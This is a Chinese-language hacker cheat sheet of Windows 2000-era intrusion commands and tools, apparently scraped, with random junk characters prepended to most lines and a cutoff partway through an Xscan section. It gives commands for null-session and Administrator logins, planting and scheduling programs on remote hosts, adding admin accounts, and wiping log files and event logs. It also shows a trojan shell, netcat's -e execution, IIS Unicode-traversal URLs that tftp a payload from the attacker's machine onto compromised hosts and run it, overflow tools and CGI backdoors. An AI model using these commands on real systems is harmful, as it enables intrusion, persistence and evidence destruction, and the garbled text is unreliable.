网管和黑客都必须知道的命令
F \KjEl0 常用的几条NET命令:
,JAx
?Xb !dyXJQ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
2^h27A Br1&8L-|% (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
RP[{4Q8 K1 EynU
I (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
}wr{W:j BJ$9vbhZN (查看远程主机时间) net time \\IP地址
M+||rct Pg,b-W?n* (定时启动某个程序) at \\IP地址 02:18 readme.exe
[uC]*G] r`W)0oxD (查看共享) net view \\IP地址
3!XjtVhK?I #@YPic"n7` (查看netbios工作组列表) nbtstat -A IP地址
R!\_rc1/ uwzvb gup? (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
HHDl8lo ]m
g)Q:d, (这两条把自己增加到管理员组): net user 用户名 密码 /add
x+Ttl4 y"bByd|6 net localgroup Administrators 用户名 /add
*scVJ Aw$x;3y (断开连接) net use \\IP地址\ipc$ /delete
^t` k0< }zkHJxZgE 扫尾:
K2M~-S3 {MtpkUN del C:\winnt\system32\logfiles\*.*
;X?}x%$ R "n5 del C:\winnt\ssytem32\config\*.evt
h`KFL/fT [Y|8\Ph`& del C:\winnt\system32\dtclog\*.*
|n+qMql' _"?.! del C:\winnt\system32\*.log
-I*^-+>H 77C'*tt1] del C:\winnt\system32\*.txt
t2/#&J] u$DHVRrF< del C:\winnt\*.txt
$ 7O}S.x sD{Wxv del C:\winnt\*.log
\Jx04[= Lm*e5JnV 一、netsvc.exe
?k]2*}bz d/PiiiFf, 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
"$#xK |t f!\lg netsvc /list \\IP地址
<'qeXgi 9>l*lCA netsvc schedule \\IP地址 /query
-}nxJH ) S|SV$_
( netsvc \\IP地址 schedule /start
o)Iff)m$ 4" Cb/y3 二、OpenTelnet.exe
ockTe5U 9!6f-K 远程启动主机的Telnet服务,并绑定端口到7878,例如:
f%SZg!+t PPb7%2r OpenTelnet \\IP地址 用户名 密码 1 7878
kDEPs$^ ?3nR 然后就可以telnet到主机的7878端口,进入DOS方式下:
h]Wr [v 'C`U"I telnet IP地址 7878
O{QA HBy[FYa4 三、winshell.exe
SQ44 d:#yEC 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
J3e96t~u M$y+q
^ p Path (查看winshell主程序的路径信息)
s8ywKTR- fmQ_P.c b reBoot (重新启动机器)
/M|262% :yRo3c d shutDown (关闭机器)
xDG2ws=@D 5"CZh.J s Shell (执行后你就会看到可爱的“C:\>”)
p~SClaR3H U}6B*Xx' x eXit (退出本次登录会话,此命令并不终止winshell的运行)
dYG,_ji [0(B>a3J CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
qAAX;N 419x+3>} 四、3389登陆器,GUI方式登录远程主机的
|uX,5Q#6 >[9J?H 五、elsave.exe
0O9Ni='Tn 43|XSyS 事件日志清除工具
>hPQRd ,VCyG:dw elsave -s \\IP地址 -l "application" -C
TOkp%@9/ f({Ei`| elsave -s \\IP地址 -l "system" -C
Hw7;;HK
7 'JCZ]pZ elsave -s \\IP地址 -l "security" -C
VRI0W` >d,jKlh^.% 执行后成功清除应用程序日志,系统日志,安全日志
wCr(D>iM o<[#0T^K 六、hbulot.exe
Jl5c
[F M!/Cknm 开启win2kserver和winxp的3389服务
I$<<(VWH C1jHz hbulot [/r]
+_; l|uhT; - db_E# 使用/r表示安装完成后自动重起目标使设置生效。
/JHc! D eCqHvMp 七、nc.exe(netcat.exe)
b\3Oyp> :<hXH^n 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
()5[x.xK@ )+[ gd/<C. 想要连接到某处: nc [-options] hostname port[s] [ports] ...
^su<uG<R +Af"f' ) 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
%/|9@e r :pGaFWkvO 参数:
"t(p&;d #
WAZ9,t -e prog 程序重定向,一旦连接,就执行 [危险!!]
Y"~gw~7OD |$vX<. S -g gateway source-routing hop point[s], up to 8
/W>iJfx pi
Z[Y
5OE -G num source-routing pointer: 4, 8, 12, ...
np8gKVD PcA2/!a -h 帮助信息
5Ow[~p"l< <,[cQ I/ -i secs 延时的间隔
K
P Oa|$ do*EKo -l 监听模式,用于入站连接
<kGU,@6PF %kS(LlL+6 -n 指定数字的IP地址,不能用hostname
\6R,Nq ^>jwh -o file 记录16进制的传输
NWMFtT \.-}adKg -p port 本地端口号
q35f&O; %Z):>' -r 任意指定本地及远程端口
\QYFAa p-Kz-+A [ -s addr 本地源地址
j`~Ms> sg$rzT-S4 -u UDP模式
/atW8 `& ^; )8VP6 -v 详细输出——用两个-v可得到更详细的内容
#vti+A~n,4 aqj@Cjk4Z -w secs timeout的时间
@cFJeOC| (oEC6F -z 将输入输出关掉——用于扫描时
uTKD 4yig 八、TFTPD32.EXE
:9QZPsL L)@?e?9 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
v^d]~!h 3E!|<q$z http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
j$?{\iXZ OmIg<v0\; 然后可以直接令文件运行:
]pH-2_
TU:7Df http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
m^ tFi7c 5hQE4/hH 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
p<,*3huj Q9Kve3u-i 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
YoBPLS`K UA48Ug 一、一 Xscan命令行运行参数说明:
j4|N-: {L/ tst#C 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
HY&aV2|A1 jRJn+ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
W-?()dX{ -f% ' xscan -file <主机列表文件名> <检测项目> [其他选项]
$a
]_w.@ @?yX!_YC 其中<检测项目> 含义如下:
!cO]<